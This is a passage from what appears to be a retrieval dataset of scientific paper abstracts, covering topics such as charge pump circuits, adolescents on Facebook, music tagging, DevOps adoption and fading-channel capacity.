"text": "Charge pump circuits are used for obtaining higher voltages than normal power supply voltage in flash memories, DRAMs and low voltage designs. In this paper, we present a charge pump circuit in standard CMOS technology that is suited for low voltage operation. Our proposed charge pump uses a cross- connected NMOS cell as the basic element and PMOS switches are employed to connect one stage to the next. The simulated output voltages of the proposed 4 stage charge pump for input voltage of 0.9 V, 1.2 V, 1.5 V, 1.8 V and 2.1 V are 3.9 V, 5.1 V, 6.35 V, 7.51 V and 8.4 V respectively. This proposed charge pump is suitable for low power CMOS mixed-mode designs.",
"title": ""
},
{
"docid": "5f7692030a6ebfe64a89a37835ea3571",
"text": "Social networking sites are a substantial part of adolescents' daily lives. By using a longitudinal approach the current study examined the impact of (a) positive self-presentation, (b) number of friends, and (c) the initiation of online relationships on Facebook on adolescents' self-esteem and their initiation of offline relationships, as well as the mediating role of positive feedback. Questionnaire data were obtained from 217 adolescents (68% girls, mean age 16.7 years) in two waves. Adolescents' positive self-presentation and number of friends were found to be related to a higher frequency of receiving positive feedback, which in turn was negatively associated with self-esteem. However, the number of Facebook friends had a positive impact on self-esteem, and the initiation of online relationships positively influenced the initiation of offline relationships over time, demonstrating that Facebook may be a training ground for increasing adolescents' social skills. Implications and suggestions for future research are provided.",
"title": ""
},
{
"docid": "c9dca9b27abe9ebabeff7c7e3814dcae",
"text": "The Internet of Things (IoT) can be defined as an environment where internet capabilities are applied to everyday objects that have earlier not been considered as computers to provide a network connectivity that will enable these objects to generate, exchange and consume data. According to a forecast given by the Ericsson Mobility report issued in June 2016, there will be as many as 16 billion connected devices that will get Internet of Things (IoT) technology-enabled by 2021. Apart from having its uses in personal well-being and comfort, IoT will be a key factor in the planning of smart cities specially in the time when governments are focussed on the development of smart cities. This technology can be implemented not just for communication networks but also for sanitation, transportation, healthcare, energy use and much more.",
"title": ""
},
{
"docid": "1e9e64a89947c08f8ce298d7e0de4183",
"text": "This paper proposes a novel architecture for plug-in electric vehicles (PEVs) dc charging station at the megawatt level, through the use of a grid-tied neutral point clamped (NPC) converter. The proposed bipolar dc structure reduces the step-down effort on the dc-dc fast chargers. In addition, this paper proposes a balancing mechanism that allows handling any difference on the dc loads while keeping the midpoint voltage accurately regulated. By formally defining the unbalance operation limit, the proposed control scheme is able to provide complementary balancing capabilities by the use of an additional NPC leg acting as a bidirectional dc-dc stage, simulating the minimal load condition and allowing the modulator to keep the control on the dc voltages under any load scenario. The proposed solution enables fast charging for PEVs concentrating several charging units into a central grid-tied converter. In this paper, simulation and experimental results are presented to validate the proposed charging station architecture.",
"title": ""
},
{
"docid": "4f3936b753abd2265d867c0937aec24c",
"text": "A weighted constraint satisfaction problem (WCSP) is a constraint satisfaction problem in which preferences among solutions can be expressed. Bucket elimination is a complete technique commonly used to solve this kind of constraint satisfaction problem. When the memory required to apply bucket elimination is too high, a heuristic method based on it (denominated mini-buckets) can be used to calculate bounds for the optimal solution. Nevertheless, the curse of dimensionality makes these techniques impractical on large scale problems. In response to this situation, we present a memetic algorithm for WCSPs in which bucket elimination is used as a mechanism for recombining solutions, providing the best possible child from the parental set. Subsequently, a multi-level model in which this exact/metaheuristic hybrid is further hybridized with branch-and-bound techniques and mini-buckets is studied. As a case study, we have applied these algorithms to the resolution of the maximum density still life problem, a hard constraint optimization problem based on Conway’s game of life. The resulting algorithm consistently finds optimal patterns for up to date solved instances in less time than current approaches. Moreover, it is shown that this proposal provides new best known solutions for very large instances.",
"title": ""
},
{
"docid": "ae7347af720ab76ab098a62b3236c17c",
"text": "We propose discriminative adversarial networks (DAN) for semi-supervised learning and loss function learning. Our DAN approach builds upon generative adversarial networks (GANs) and conditional GANs but includes the key differentiator of using two discriminators instead of a generator and a discriminator. DAN can be seen as a framework to learn loss functions for predictors that also implements semi-supervised learning in a straightforward manner. We propose instantiations of DAN for two different prediction tasks: classification and ranking. Our experimental results on three datasets of different tasks demonstrate that DAN is a promising framework for both semi-supervised learning and learning loss functions for predictors. For all tasks, the semi-supervised capability of DAN can significantly boost the predictor performance for small labeled sets with minor architecture changes across tasks. Moreover, the loss functions automatically learned by DANs are very competitive and usually outperform the standard pairwise and negative log-likelihood loss functions for semi-supervised learning.",
"title": ""
},
{
"docid": "e143eb298fff97f8f58cc52caa945640",
"text": "Supervised domain adaptation—where a large generic corpus and a smaller indomain corpus are both available for training—is a challenge for neural machine translation (NMT). Standard practice is to train a generic model and use it to initialize a second model, then continue training the second model on in-domain data to produce an in-domain model. We add an auxiliary term to the training objective during continued training that minimizes the cross entropy between the indomain model’s output word distribution and that of the out-of-domain model to prevent the model’s output from differing too much from the original out-ofdomain model. We perform experiments on EMEA (descriptions of medicines) and TED (rehearsed presentations), initialized from a general domain (WMT) model. Our method shows improvements over standard continued training by up to 1.5 BLEU.",
"title": ""
},
{
"docid": "3ee6ad4099e8fe99042472207e6dac09",
"text": "The millimeter-wave (mmWave) band offers the potential for high-bandwidth communication channels in cellular networks. It is not clear, however, whether both high data rates and coverage in terms of signal-to-noise-plus-interference ratio can be achieved in interference-limited mmWave cellular networks due to the differences in propagation conditions and antenna topologies. This article shows that dense mmWave networks can achieve both higher data rates and comparable coverage relative to conventional microwave networks. Sum rate gains can be achieved using more advanced beamforming techniques that allow multiuser transmission. The insights are derived using a new theoretical network model that incorporates key characteristics of mmWave networks.",
"title": ""
},
{
"docid": "bd110cfe3a3dbb31057fec06e6a5e8d9",
"text": "In this study, it proposes a new optimization algorithm called APRIORI-IMPROVE based on the insufficient of Apriori. APRIORI-IMPROVE algorithm presents optimizations on 2-items generation, transactions compression and so on. APRIORI-IMPROVE uses hash structure to generate L2, uses an efficient horizontal data representation and optimized strategy of storage to save time and space. The performance study shows that APRIORI-IMPROVE is much faster than Apriori.",
"title": ""
},
{
"docid": "2c37ee67205320d54149a71be104c0e1",
"text": "This talk will review the mission, activities, and recommendations of the Blue Ribbon Panel on Cyberinfrastructure recently appointed by the leadership on the U.S. National Science Foundation (NSF). The NSF invests in people, ideas, and tools and in particular is a major investor in basic research to produce communication and information technology (ICT) as well as its use in supporting basic research and education in most all areas of science and engineering. The NSF through its Directorate for Computer and Information Science and Engineering (CISE) has provided substantial funding for high-end computing resources, initially by awards to five supercomputer centers and later through $70 M per year investments in two partnership alliances for advanced computation infrastructures centered at the University of Illinois and the University of California, San Diego. It has also invested in an array of complementary R&D initiatives in networking, middleware, digital libraries, collaboratories, computational and visualization science, and distributed terascale grid environments.",
"title": ""
},
{
"docid": "b3ced0cf4520f44bc1fd745ae439bcf6",
"text": "This paper describes the basic principles of traditional 2D hand drawn animation and their application to 3D computer animation. After describing how these principles evolved, the individual principles are detailed, addressing their meanings in 2D hand drawn animation and their application to 3D computer animation. This should demonstrate the importance of these principles to quality 3D computer animation.",
"title": ""
},
{
"docid": "4fec66381a581c310921be16077e049e",
"text": "Saliva is increasingly recognised as an attractive diagnostic fluid. The presence of various disease signalling salivary biomarkers that accurately reflect normal and disease states in humans and the sampling benefits compared to blood sampling are some of the reasons for this recognition. This explains the burgeoning research field in assay developments and technological advancements for the detection of various salivary biomarkers to improve clinical diagnosis, management, and treatment. This paper reviews the significance of salivary biomarkers for clinical diagnosis and therapeutic applications, with focus on the technologies and biosensing platforms that have been reported for screening these biomarkers.",
"title": ""
},
{
"docid": "50ebb1feb21be692aaddb6ca74170c49",
"text": "We show that a character-level encoderdecoder framework can be successfully applied to question answering with a structured knowledge base. We use our model for singlerelation question answering and demonstrate the effectiveness of our approach on the SimpleQuestions dataset (Bordes et al., 2015), where we improve state-of-the-art accuracy from 63.9% to 70.9%, without use of ensembles. Importantly, our character-level model has 16x fewer parameters than an equivalent word-level model, can be learned with significantly less data compared to previous work, which relies on data augmentation, and is robust to new entities in testing. 1",
"title": ""
},
{
"docid": "2421518a0646cb76d2aac6c33ccd06dc",
"text": "Modern technologies enable us to record sequences of online user activity at an unprecedented scale. Although such activity logs are abundantly available, most approaches to recommender systems are based on the rating-prediction paradigm, ignoring temporal and contextual aspects of user behavior revealed by temporal, recurrent patterns. In contrast to explicit ratings, such activity logs can be collected in a non-intrusive way and can offer richer insights into the dynamics of user preferences, which could potentially lead more accurate user models. In this work we advocate studying this ubiquitous form of data and, by combining ideas from latent factor models for collaborative filtering and language modeling, propose a novel, flexible and expressive collaborative sequence model based on recurrent neural networks. The model is designed to capture a user’s contextual state as a personalized hidden vector by summarizing cues from a data-driven, thus variable, number of past time steps, and represents items by a real-valued embedding. We found that, by exploiting the inherent structure in the data, our formulation leads to an efficient and practical method. Furthermore, we demonstrate the versatility of our model by applying it to two different tasks: music recommendation and mobility prediction, and we show empirically that our model consistently outperforms static and non-collaborative methods.",
"title": ""
},
{
"docid": "e67f95384ce816124648cdc33cd7091c",
"text": "A high-efficiency push-pull power amplifier has been designed and measured across a bandwidth of 250MHz to 3.1GHz. The output power was 46dBm with a drain efficiency of above 45% between 700MHz and 2GHz, with a minimum output power of 43dBm across the entire band. In addition, a minimum of 60% drain efficiency and 11dB transducer gain was measured between 350MHz and 1GHz. The design was realized using a coaxial cable transmission line balun, which provides a broadband 2∶1 impedance transformation ratio and reduces the need for bandwidth-limiting conventional matching. The combination of output power, bandwidth and efficiency are believed to be the best reported to date at these frequencies.",
"title": ""
},
{
"docid": "b82f7b7a317715ba0c7ca87db92c7bf6",
"text": "Regions of hypoxia in tumours can be modelled in vitro in 2D cell cultures with a hypoxic chamber or incubator in which oxygen levels can be regulated. Although this system is useful in many respects, it disregards the additional physiological gradients of the hypoxic microenvironment, which result in reduced nutrients and more acidic pH. Another approach to hypoxia modelling is to use three-dimensional spheroid cultures. In spheroids, the physiological gradients of the hypoxic tumour microenvironment can be inexpensively modelled and explored. In addition, spheroids offer the advantage of more representative modelling of tumour therapy responses compared with 2D culture. Here, we review the use of spheroids in hypoxia tumour biology research and highlight the different methodologies for spheroid formation and how to obtain uniformity. We explore the challenge of spheroid analyses and how to determine the effect on the hypoxic versus normoxic components of spheroids. We discuss the use of high-throughput analyses in hypoxia screening of spheroids. Furthermore, we examine the use of mathematical modelling of spheroids to understand more fully the hypoxic tumour microenvironment.",
"title": ""
},
{
"docid": "269a1feea406f1c7c21793c69458b7ec",
"text": "In this paper, we investigate the following question:whenperformingnext best viewselection for volumetric 3D reconstruction of an object by a mobile robot equipped with a dense (camera-based) depth sensor, what formulation of information gain is best? To address this question, we propose several new ways to quantify the volumetric information (VI) contained in the voxels of a probabilistic volumetric map, and compare them to the state of the art with extensive simulated experiments. Our proposed formulations incorporate factors such as visibility likelihood and the likelihood of seeing new parts of the object. The results of our experiments allow us to draw some clear conclusions about the VI formulations that are most effective in different mobile-robot reconstruction scenarios. To the best of our knowledge, this is the first comparative survey of VI formulation performance for active 3D object reconstruction. Additionally, our modular software framework is adaptable to other robotic platforms and general reconstruction problems, and we release it open source for autonomous reconstruction tasks.",
"title": ""
}
] | scidocsrr |
3ac18e86840280b45db50d118f06b177 | Music Retrieval and Recommendation: A Tutorial Overview | [
{
"docid": "a8d7f6dcaf55ebd5ec580b2b4d104dd9",
"text": "In this paper we investigate social tags as a novel highvolume source of semantic metadata for music, using techniques from the fields of information retrieval and multivariate data analysis. We show that, despite the ad hoc and informal language of tagging, tags define a low-dimensional semantic space that is extremely well-behaved at the track level, in particular being highly organised by artist and musical genre. We introduce the use of Correspondence Analysis to visualise this semantic space, and show how it can be applied to create a browse-by-mood interface for a psychologically-motivated two-dimensional subspace rep resenting musical emotion.",
"title": ""
}
] | [
{
"docid": "204f7f8282954de4d6b725f5cce0b00f",
"text": "Traffic classification plays an important and basic role in network management and cyberspace security. With the widespread use of encryption techniques in network applications, encrypted traffic has recently become a great challenge for the traditional traffic classification methods. In this paper we proposed an end-to-end encrypted traffic classification method with one-dimensional convolution neural networks. This method integrates feature extraction, feature selection and classifier into a unified end-to-end framework, intending to automatically learning nonlinear relationship between raw input and expected output. To the best of our knowledge, it is the first time to apply an end-to-end method to the encrypted traffic classification domain. The method is validated with the public ISCX VPN-nonVPN traffic dataset. Among all of the four experiments, with the best traffic representation and the fine-tuned model, 11 of 12 evaluation metrics of the experiment results outperform the state-of-the-art method, which indicates the effectiveness of the proposed method.",
"title": ""
},
{
"docid": "e7a22474a051cfd64e64e393d87ff1c9",
"text": "Sequence alignment is an important problem in computational biology. We compare two different approaches to the problem of optimally aligning two or more character strings: bounded dynamic programming (BDP), and divide-and-conquer frontier search (DCFS). The approaches are compared in terms of time and space requirements in 2 through 5 dimensions with sequences of varying similarity and length. While BDP performs better in two and three dimensions, it consumes more time and memory than DCFS for higher-dimensional problems.",
"title": ""
},
{
"docid": "f1fa70e4e39b727be7a1f8f87a45a935",
"text": "We investigate electronic transport properties of the squashed armchair carbon nanotubes, using tight-binding molecular dynamics and the Green's function method. We demonstrate a metal-to-semiconductor transition while squashing the nanotubes and a general mechanism for such a transition. It is the distinction of the two sublattices in the nanotube that opens an energy gap near the Fermi energy. We show that the transition has to be achieved by a combined effect of breaking of mirror symmetry and bond formation between the flattened faces in the squashed nanotubes.",
"title": ""
},
{
"docid": "89c76729f6d1e53b35ecce548c5955af",
"text": "A high fidelity biomimetic hand actuated by 9 stepper motors packaged within forearm casing was manufactured for less than 350 USD; it has 18 mechanical degrees of freedom, is 38 cm long, weighs 2.2 kg. The hand model has 3D printed replicas of human bones and laser cut tendons and ligaments. The user intent is deduced from EEG and EMG signals, obtained by Neurosky and Myoware commercial sensors, respectively. Three distinct EEG patterns trigger pinch, hook, and point actions. EMG signals are used for finer motor control, e.g. strength of grip. A pilot test study on three subjects showed that EMG can actuate the hand with an 80% success rate, while EEG allows for a 68% success rate. The system proved its robustness at the 2017 Cambridge Science Festival, using EEG signals alone. Out of approximately 30 visitors the majority could generate a “peace” sign after 1 to 2 minutes.",
"title": ""
},
{
"docid": "dd1e7e027d88e58f9c85c8a43482b404",
"text": "Strepsiptera are obligate endoparasitoids that exhibit extreme sexual dimorphism and parasitize seven orders and 33 families of Insecta. The adult males and the first instar larvae in the Mengenillidia and Stylopidia are free-living, whereas the adult females in Mengenillidia are free-living but in the suborder Stylopidia they remain endoparasitic in the host. Parasitism occurs at the host larval/nymphal stage and continues in a mobile host until that host's adult stage. The life of the host is lengthened to allow the male strepsipteran to complete maturation and the viviparous female to release the first instar larvae when the next generation of the host's larvae/nymphs has been produced. The ability of strepsipterans to parasitize a wide range of hosts, in spite of being endoparasitoids, is perhaps due to their unique immune avoidance system. Aspects of virulence, heterotrophic heteronomy in the family Myrmecolacidae, cryptic species, genomics, immune response, and behavior of stylopized hosts are discussed in this chapter.",
"title": ""
},
{
"docid": "0cb34c6202328c57dbd1e8e7270d8aa6",
"text": "Optimization of deep learning is no longer an imminent problem, due to various gradient descent methods and the improvements of network structure, including activation functions, the connectivity style, and so on. Then the actual application depends on the generalization ability, which determines whether a network is effective. Regularization is an efficient way to improve the generalization ability of deep CNN, because it makes it possible to train more complex models while maintaining a lower overfitting. In this paper, we propose to optimize the feature boundary of deep CNN through a two-stage training method (pre-training process and implicit regularization training process) to reduce the overfitting problem. In the pre-training stage, we train a network model to extract the image representation for anomaly detection. In the implicit regularization training stage, we re-train the network based on the anomaly detection results to regularize the feature boundary and make it converge in the proper position. Experimental results on five image classification benchmarks show that the two-stage training method achieves a state-of-the-art performance and that it, in conjunction with more complicated anomaly detection algorithm, obtains better results. Finally, we use a variety of strategies to explore and analyze how implicit regularization plays a role in the two-stage training process. Furthermore, we explain how implicit regularization can be interpreted as data augmentation and model ensemble.",
"title": ""
},
{
"docid": "835309dca26f0c3fc5a750f9957092da",
"text": "Offline training and testing are playing an essential role in design and evaluation of intelligent vehicle vision algorithms. Nevertheless, long-term inconvenience concerning traditional image datasets is that manually collecting and annotating datasets from real scenes lack testing tasks and diverse environmental conditions. For that virtual datasets can make up for these regrets. In this paper, we propose to construct artificial scenes for evaluating the visual intelligence of intelligent vehicles and generate a new virtual dataset called “ParallelEye-CS”. First of all, the actual track map data is used to build 3D scene model of Chinese Flagship Intelligent Vehicle Proving Center Area, Changshu. Then, the computer graphics and virtual reality technologies are utilized to simulate the virtual testing tasks according to the Chinese Intelligent Vehicles Future Challenge (IVFC) tasks. Furthermore, the Unity3D platform is used to generate accurate ground-truth labels and change environmental conditions. As a result, we present a viable implementation method for constructing artificial scenes for traffic vision research. The experimental results show that our method is able to generate photorealistic virtual datasets with diverse testing tasks.",
"title": ""
},
{
"docid": "5a3f542176503ddc6fcbd0fe29f08869",
"text": "INTRODUCTION\nArtificial intelligence is a branch of computer science capable of analysing complex medical data. Their potential to exploit meaningful relationship with in a data set can be used in the diagnosis, treatment and predicting outcome in many clinical scenarios.\n\n\nMETHODS\nMedline and internet searches were carried out using the keywords 'artificial intelligence' and 'neural networks (computer)'. Further references were obtained by cross-referencing from key articles. An overview of different artificial intelligent techniques is presented in this paper along with the review of important clinical applications.\n\n\nRESULTS\nThe proficiency of artificial intelligent techniques has been explored in almost every field of medicine. Artificial neural network was the most commonly used analytical tool whilst other artificial intelligent techniques such as fuzzy expert systems, evolutionary computation and hybrid intelligent systems have all been used in different clinical settings.\n\n\nDISCUSSION\nArtificial intelligence techniques have the potential to be applied in almost every field of medicine. There is need for further clinical trials which are appropriately designed before these emergent techniques find application in the real clinical setting.",
"title": ""
},
{
"docid": "22646672196b49cc0fde4b6c6e187fd1",
"text": "There is a tremendous increase in the research of data mining. Data mining is the process of extraction of data from large database. Knowledge Discovery in database (KDD) is another name of data mining. Privacy protection has become a necessary requirement in many data mining applications due to emerging privacy legislation and regulations. One of the most important topics in research community is Privacy Preserving Data Mining (PPDM). Privacy preserving data mining (PPDM) deals with protecting the privacy of individual data or sensitive knowledge without sacrificing the utility of the data. The Success of Privacy Preserving data mining algorithms is measured in terms of its performance, data utility, level of uncertainty or resistance to data mining algorithms etc. In this paper we will review on various privacy preserving techniques like Data perturbation, condensation etc.",
"title": ""
},
{
"docid": "b02739fef8a910d0a97c6f4ff1636b06",
"text": "To operate in human-robot coexisting environments, intelligent robots need to simultaneously reason with commonsense knowledge and plan under uncertainty. Markov decision processes (MDPs) and partially observable MDPs (POMDPs), are good at planning under uncertainty toward maximizing long-term rewards; P-LOG, a declarative programming language under Answer Set semantics, is strong in commonsense reasoning. In this paper, we present a novel algorithm called iCORPP to dynamically reason about, and construct (PO)MDPs using P-LOG. iCORPP successfully shields exogenous domain attributes from (PO)MDPs, which limits computational complexity and enables (PO)MDPs to adapt to the value changes these attributes produce. We conduct a number of experimental trials using two example problems in simulation and demonstrate iCORPP on a real robot. Results show significant improvements compared to competitive baselines.",
"title": ""
},
{
"docid": "03550fad9c5f21c69253f2bfc389fccc",
"text": "The design of a Ka dual-band circular polarizer by inserting a dielectric septum in the middle of the circular waveguide is discussed here. The dielectric septum is located in fixing slots, and by adjusting the dimension of the dual-compensation slots which are built in the orthogonal plane, the phase difference of 90deg at the center frequency for the dual-band can be achieved. Furthermore, the gradual changing structures at both ends of the dielectric septum are built for impedance matching for both Ex and Ey polarizations. The simple structure of this kind of polarizer can reduce the influence of manufacturing inaccuracy in the Ka-band. The measured phase difference is within 90degplusmn 4.5deg for both bands. In addition, the return losses for both Ex and Ey polarizations are better than -15 dB.",
"title": ""
},
{
"docid": "48903eded4e1a88114e3917e2e6173b6",
"text": "The problem of generating maps with mobile robots has received considerable attention over the past years. Most of the techniques developed so far have been designed for situations in which the environment is static during the mapping process. Dynamic objects, however, can lead to serious errors in the resulting maps such as spurious objects or misalignments due to localization errors. In this paper we consider the problem of creating maps with mobile robots in dynamic environments. We present a new approach that interleaves mapping and localization with a probabilistic technique to identify spurious measurements. In several experiments we demonstrate that our algorithm generates accurate 2d and 3d in different kinds of dynamic indoor and outdoor environments. We also use our algorithm to isolate the dynamic objects and to generate three-dimensional representation of them.",
"title": ""
},
{
"docid": "d5c3e1baa2425616154e9d5252e7d393",
"text": "Article history: Available online 18 June 2010",
"title": ""
},
{
"docid": "2d56fdb56ede1b5745db9031a411df5c",
"text": "Reconstructed 3D human epidermal skin models are being used increasingly for safety testing of chemicals. Based on EpiDerm™ tissues, an assay was developed in which the tissues were topically exposed to test chemicals for 3h followed by cell isolation and assessment of DNA damage using the comet assay. Inter-laboratory reproducibility of the 3D skin comet assay was initially demonstrated using two model genotoxic carcinogens, methyl methane sulfonate (MMS) and 4-nitroquinoline-n-oxide, and the results showed good concordance among three different laboratories and with in vivo data. In Phase 2 of the project, intra- and inter-laboratory reproducibility was investigated with five coded compounds with different genotoxicity liability tested at three different laboratories. For the genotoxic carcinogens MMS and N-ethyl-N-nitrosourea, all laboratories reported a dose-related and statistically significant increase (P < 0.05) in DNA damage in every experiment. For the genotoxic carcinogen, 2,4-diaminotoluene, the overall result from all laboratories showed a smaller, but significant genotoxic response (P < 0.05). For cyclohexanone (CHN) (non-genotoxic in vitro and in vivo, and non-carcinogenic), an increase compared to the solvent control acetone was observed only in one laboratory. However, the response was not dose related and CHN was judged negative overall, as was p-nitrophenol (p-NP) (genotoxic in vitro but not in vivo and non-carcinogenic), which was the only compound showing clear cytotoxic effects. For p-NP, significant DNA damage generally occurred only at doses that were substantially cytotoxic (>30% cell loss), and the overall response was comparable in all laboratories despite some differences in doses tested. The results of the collaborative study for the coded compounds were generally reproducible among the laboratories involved and intra-laboratory reproducibility was also good. These data indicate that the comet assay in EpiDerm™ skin models is a promising model for the safety assessment of compounds with a dermal route of exposure.",
"title": ""
},
{
"docid": "1123b7c561945627289923a0ad9df53e",
"text": "Concluding his provocative 1989 essay delineating how Charlotte Perkins Gilman’s “The Yellow Wallpaper” functions as a Gothic allegory, Greg Johnson describes Gilman’s achievement as yet awaiting its “due recognition” and her compelling short story as being “[s]till under-read, still haunting the margins of the American literary canon” (530). Working from the premise that Gilman’s tale “adroitly and at times parodically employs Gothic conventions to present an allegory of literary imagination unbinding the social, domestic, and psychological confinements of a nineteenth-century woman writer,” Johnson provides a fairly satisfactory general overview of “The Yellow Wallpaper” as a Gothic production (522). Despite the disputable claim that Gilman’s story functions, in part, as a Gothic parody, he correctly identifies and aptly elucidates several of the most familiar Gothic themes at work in this study— specifically “confinement and rebellion, forbidden desire and ‘irrational’ fear”—alongside such traditional Gothic elements as “the distraught heroine, the forbidding mansion, and the powerfully repressive male antagonist” (522). Johnson ultimately overlooks,",
"title": ""
},
{
"docid": "1f6e92bc8239e358e8278d13ced4a0a9",
"text": "This paper proposes a method for hand pose estimation from RGB images that uses both external large-scale depth image datasets and paired depth and RGB images as privileged information at training time. We show that providing depth information during training significantly improves performance of pose estimation from RGB images during testing. We explore different ways of using this privileged information: (1) using depth data to initially train a depth-based network, (2) using the features from the depthbased network of the paired depth images to constrain midlevel RGB network weights, and (3) using the foreground mask, obtained from the depth data, to suppress the responses from the background area. By using paired RGB and depth images, we are able to supervise the RGB-based network to learn middle layer features that mimic that of the corresponding depth-based network, which is trained on large-scale, accurately annotated depth data. During testing, when only an RGB image is available, our method produces accurate 3D hand pose predictions. Our method is also tested on 2D hand pose estimation. Experiments on three public datasets show that the method outperforms the state-of-the-art methods for hand pose estimation using RGB image input.",
"title": ""
},
{
"docid": "8fbec2539107e58a6cd4e6266dc20ccc",
"text": "The Indoor flights of UAV (Unmanned Aerial Vehicle) are susceptible to impacts of multiples obstacles and walls. The most basic controller that a drone requires in order to achieve indoor flight, is a controller that can maintain the drone flying in the same site, this is called hovering control. This paper presents a fuzzy PID controller for hovering. The control system to modify the gains of the parameters of the PID controllers in the x and y axes as a function of position and error in each axis, of a known environment. Flight tests were performed over an AR.Drone 2.0, comparing RMSE errors of hovering with classical PID and fuzzy PID under disturbances. The fuzzy PID controller reduced the average error from 11 cm to 8 cm in a 3 minutes test. This result is an improvement over previously published works.",
"title": ""
},
{
"docid": "eded1c6b0eb12705e7528fe34aa994cf",
"text": "We develop a novel probabilistic generative model based on the variational autoencoder approach. Notable aspects of our architecture are: a novel way of specifying the latent variables prior, and the introduction of an ordinality enforcing unit. We describe how to do supervised, unsupervised and semi-supervised learning, and nominal and ordinal classification, with the model. We analyze generative properties of the approach, and the classification effectiveness under nominal and ordinal classification, using two benchmark datasets. Our results show that our model can achieve comparable results with relevant baselines in both of the classification tasks.",
"title": ""
},
{
"docid": "4a7915450629440d68fb6ae05692344e",
"text": "Sample size justification is an important consideration when planning a clinical trial, not only for the main trial but also for any preliminary pilot trial. When the outcome is a continuous variable, the sample size calculation requires an accurate estimate of the standard deviation of the outcome measure. A pilot trial can be used to get an estimate of the standard deviation, which could then be used to anticipate what may be observed in the main trial. However, an important consideration is that pilot trials often estimate the standard deviation parameter imprecisely. This paper looks at how we can choose an external pilot trial sample size in order to minimise the sample size of the overall clinical trial programme, that is, the pilot and the main trial together. We produce a method of calculating the optimal solution to the required pilot trial sample size when the standardised effect size for the main trial is known. However, as it may not be possible to know the standardised effect size to be used prior to the pilot trial, approximate rules are also presented. For a main trial designed with 90% power and two-sided 5% significance, we recommend pilot trial sample sizes per treatment arm of 75, 25, 15 and 10 for standardised effect sizes that are extra small (≤0.1), small (0.2), medium (0.5) or large (0.8), respectively.",
"title": ""
},
{
"docid": "8d581aef7779713f3cb9f236fb83d7ff",
"text": "Sandro Botticelli was one of the most esteemed painters and draughtsmen among Renaissance artists. Under the patronage of the De' Medici family, he was active in Florence during the flourishing of the Renaissance trend towards the reclamation of lost medical and anatomical knowledge of ancient times through the dissection of corpses. Combining the typical attributes of the elegant courtly style with hallmarks derived from the investigation and analysis of classical templates, he left us immortal masterpieces, the excellence of which incomprehensibly waned and was rediscovered only in the 1890s. Few know that it has already been reported that Botticelli concealed the image of a pair of lungs in his masterpiece, The Primavera. The present investigation provides evidence that Botticelli embedded anatomic imagery of the lung in another of his major paintings, namely, The Birth of Venus. Both canvases were most probably influenced and enlightened by the neoplatonic philosophy of the humanist teachings in the De' Medici's circle, and they represent an allegorical celebration of the cycle of life originally generated by the Divine Wind or Breath. This paper supports the theory that because of the anatomical knowledge to which he was exposed, Botticelli aimed to enhance the iconographical meaning of both the masterpieces by concealing images of the lung anatomy within them.",
"title": ""
}
] | scidocsrr |
62bd0a9d7b5e165a63d837e60067ac8b | Determining an author's native language by mining a text for errors | [
{
"docid": "be90932dfddcf02b33fc2ef573b8c910",
"text": "Style-based Text Categorization: What Newspaper Am I Reading?",
"title": ""
}
] | [
{
"docid": "5fe1fa98c953d778ee27a104802e5f2b",
"text": "We describe two general approaches to creating document-level maps of science. To create a local map one defines and directly maps a sample of data, such as all literature published in a set of information science journals. To create a global map of a research field one maps ‘all of science’ and then locates a literature sample within that full context. We provide a deductive argument that global mapping should create more accurate partitions of a research field than local mapping, followed by practical reasons why this may not be so. The field of information science is then mapped at the document level using both local and global methods to provide a case illustration of the differences between the methods. Textual coherence is used to assess the accuracies of both maps. We find that document clusters in the global map have significantly higher coherence than those in the local map, and that the global map provides unique insights into the field of information science that cannot be discerned from the local map. Specifically, we show that information science and computer science have a large interface and that computer science is the more progressive discipline at that interface. We also show that research communities in temporally linked threads have a much higher coherence than isolated communities, and that this feature can be used to predict which threads will persist into a subsequent year. Methods that could increase the accuracy of both local and global maps in the future are also discussed.",
"title": ""
},
{
"docid": "c2c2ddb9a6e42edcc1c035636ec1c739",
"text": "As the interest in DevOps continues to grow, there is an increasing need for software organizations to understand how to adopt it successfully. This study has as objective to clarify the concept and provide insight into existing challenges of adopting DevOps. First, the existing literature is reviewed. A definition of DevOps is then formed based on the literature by breaking down the concept into its defining characteristics. We interview 13 subjects in a software company adopting DevOps and, finally, we present 11 impediments for the company’s DevOps adoption that were identified based on the interviews.",
"title": ""
},
{
"docid": "8788f14a2615f3065f4f0656a4a66592",
"text": "The ability to communicate in natural language has long been considered a defining characteristic of human intelligence. Furthermore, we hold our ability to express ideas in writing as a pinnacle of this uniquely human language facility—it defies formulaic or algorithmic specification. So it comes as no surprise that attempts to devise computer programs that evaluate writing are often met with resounding skepticism. Nevertheless, automated writing-evaluation systems might provide precisely the platforms we need to elucidate many of the features that characterize good and bad writing, and many of the linguistic, cognitive, and other skills that underlie the human capacity for both reading and writing. Using computers to increase our understanding of the textual features and cognitive skills involved in creating and comprehending written text will have clear benefits. It will help us develop more effective instructional materials for improving reading, writing, and other human communication abilities. It will also help us develop more effective technologies, such as search engines and questionanswering systems, for providing universal access to electronic information. A sketch of the brief history of automated writing-evaluation research and its future directions might lend some credence to this argument.",
"title": ""
},
{
"docid": "d8cd13bcd43052550dbfdc0303ef2bc7",
"text": "We study the Shannon capacity of adaptive transmission techniques in conjunction with diversity combining. This capacity provides an upper bound on spectral efficiency using these techniques. We obtain closed-form solutions for the Rayleigh fading channel capacity under three adaptive policies: optimal power and rate adaptation, constant power with optimal rate adaptation, and channel inversion with fixed rate. Optimal power and rate adaptation yields a small increase in capacity over just rate adaptation, and this increase diminishes as the average received carrier-to-noise ratio (CNR) or the number of diversity branches increases. Channel inversion suffers the largest capacity penalty relative to the optimal technique, however, the penalty diminishes with increased diversity. Although diversity yields large capacity gains for all the techniques, the gain is most pronounced with channel inversion. For example, the capacity using channel inversion with two-branch diversity exceeds that of a single-branch system using optimal rate and power adaptation. Since channel inversion is the least complex scheme to implement, there is a tradeoff between complexity and capacity for the various adaptation methods and diversity-combining techniques.",
"title": ""
},
{
"docid": "c43de372dac79cf922f560450545e5b3",
